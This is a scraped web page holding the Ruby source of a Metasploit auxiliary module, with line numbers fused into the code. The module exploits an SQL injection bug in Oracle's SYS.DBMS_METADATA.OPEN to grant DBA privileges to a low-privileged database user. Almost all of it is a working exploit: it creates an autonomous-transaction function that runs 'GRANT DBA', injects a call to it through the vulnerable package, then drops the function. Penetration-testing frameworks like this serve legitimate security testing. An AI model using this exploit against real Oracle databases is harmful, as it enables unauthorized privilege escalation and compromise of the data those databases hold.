Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::ORACLE78def initialize(info = {})9super(update_info(info,10'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN',11'Description' => %q{12This module will escalate a Oracle DB user to DBA by exploiting an sql injection13bug in the SYS.DBMS_METADATA.OPEN package/function.14},15'Author' => [ 'MC' ],16'License' => MSF_LICENSE,17'References' =>18[19[ 'URL', 'http://www.metasploit.com' ],20],21'DisclosureDate' => '2008-01-05'))2223register_options(24[25OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]),26])27end2829def run30return if not check_dependencies3132name = Rex::Text.rand_text_alpha(rand(10) + 1)3334function = "35create or replace function #{datastore['DBUSER']}.#{name} return varchar236authid current_user is pragma autonomous_transaction;37begin38execute immediate '#{datastore['SQL']}';39return '';40end;41"4243package = "select sys.dbms_metadata.open('''||#{datastore['DBUSER']}.#{name}()||''') from dual"4445clean = "drop function #{name}"464748print_status("Sending function...")49prepare_exec(function)5051begin52print_status("Attempting sql injection on SYS.DBMS_METADATA.OPEN...")53prepare_exec(package)54rescue ::OCIError => e55if ( e.to_s =~ /ORA-24374: define not done before fetch or execute and fetch/ )56print_status("Removing function '#{name}'...")57prepare_exec(clean)58else59end60end61end62end636465